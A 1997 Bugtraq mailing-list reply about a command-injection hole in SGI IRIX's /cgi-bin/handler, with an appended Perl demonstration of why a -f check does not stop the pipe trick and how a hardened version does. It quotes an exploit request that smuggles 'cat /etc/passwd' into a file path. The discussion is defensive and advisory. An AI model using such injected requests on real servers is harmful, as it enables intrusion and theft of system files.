[4753] in bugtraq
Re: /cgi-bin/handler - more notes
daemon@ATHENA.MIT.EDU (der Mouse)
Fri Jun 20 21:28:07 1997
Date: Fri, 20 Jun 1997 15:37:02 -0400
Reply-To: der Mouse <mouse@RODENTS.MONTREAL.QC.CA>
From: der Mouse <mouse@RODENTS.MONTREAL.QC.CA>
To: BUGTRAQ@NETSPACE.ORG
> I have had reports that my exploit for SGI's /cgi-bin/handler does
> not work on IRIX 6.3 (on O2). I analyzed the code provided with IRIX
> 6.3 and they tried to fix it, but they actually DID NOT.
> telnet target.machine.com 80
> GET /cgi-bin/handler/whatever;cat /etc/passwd| ?data=Download HTTP/1.0
> [...To fix this right...]
> All "open" commands should check if their argument is really a
> filename. You could use:
> -f $doc && open (INPUT, $doc)
If you have untrusted local users who can install their own cgi-bin
stuff (I know of at least one large site that is in this situation),
this isn't enough. /cgi-bin/handler/whatever;cat\t/etc/passwd\|\t may
well exist, and open() will _still_ take it as a pipe.
> So far, IRIX versions 5.3, 6.2, and now 6.3 are vulnerable.
> Anyone on IRIX 6.4? :) (What does it run on BTW?)
I know of one site with an Octane that runs 6.4. I'd try this, but
that site runs exactly one web server, and it ain't SGI's. I could
turn on the web server on the Octane, I suppose, but I'm hesitant to
mess with it....
der Mouse
mouse@rodents.montreal.qc.ca
7D C8 61 52 5D E7 2D 39 4E F1 31 3E E8 B3 27 4B
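The two points made above, the "-f $doc && open (INPUT, $doc)" fix from the quoted message and der Mouse's objection that a planted file whose name ends in "|" gets past it, as an added, stand-alone example that is not code from SGI's handler or from either poster. It assumes a scratch directory standing in for the web tree, a constructed decoy name "true;echo PWNED|" in place of the thread's "whatever;cat /etc/passwd|", and the hypothetical helpers read_twoarg() and read_safe(); everything else is plain Perl open() behaviour.

```perl
#!/usr/bin/perl
# Added example (not from SGI's handler or the Bugtraq posters): why a
# -f test in front of a two-argument open() does not stop the pipe trick,
# and what does.  All file names below are constructed for the demo.
use strict;
use warnings;
use File::Temp qw(tempdir);

# Scratch directory standing in for the document tree (assumption).
my $dir = tempdir(CLEANUP => 1);
chdir $dir or die "chdir: $!";

# Attacker-chosen "document" name: a shell command list ending in '|'.
# The thread's payload is "whatever;cat\t/etc/passwd|\t"; two-argument
# open() strips the trailing whitespace, so the trailing tab changes
# nothing for open() but is part of the name that -f stats.  A harmless
# command is used here instead.
my $doc = "true;echo PWNED|";

# A local user who can create files (cgi-bin, a home directory, /tmp)
# plants a decoy with exactly that name, so -f $doc is true.
open(my $decoy, '>', $doc) or die "cannot create decoy: $!";
print $decoy "harmless file contents\n";
close $decoy;

# The fix proposed in the quoted message: still exploitable, because
# two-argument open() parses its argument and a trailing '|' means
# "run this command and read its output".
sub read_twoarg {
    my ($name) = @_;
    return undef unless -f $name;         # true: the decoy exists
    open(INPUT, $name) or return undef;   # 2-arg open: '|' => pipe from command
    my $data = do { local $/; <INPUT> };
    close INPUT;
    return $data;                         # output of "true;echo PWNED"
}

# Hardened: refuse anything outside a strict character set (no ';', '|',
# whitespace or other shell metacharacters), then use three-argument
# open(), which takes the name literally.  Three-argument open() is
# Perl 5.6+; on 1997-era Perl, sysopen() gives the same literal behaviour.
# A real handler would also reject ".." path components.
sub read_safe {
    my ($name) = @_;
    return undef unless $name =~ m{\A[\w./-]+\z};
    return undef unless -f $name;
    open(my $fh, '<', $name) or return undef;   # name is never parsed
    my $data = do { local $/; <$fh> };
    close $fh;
    return $data;
}

print "2-arg open with -f check: ", read_twoarg($doc) // "(refused)\n";
print "hardened:                 ", read_safe($doc)   // "(refused)\n";
```

Run it as an unprivileged user: the first line prints the output of the embedded command, not the decoy's contents, even though -f succeeded; the second refuses the name before any open() is attempted. The three-argument open() alone would also defeat the trick, since it would try to open a file literally named "true;echo PWNED|" and read "harmless file contents"; the character whitelist is there because a CGI should not be passing user-supplied names to the filesystem at all without narrowing them first.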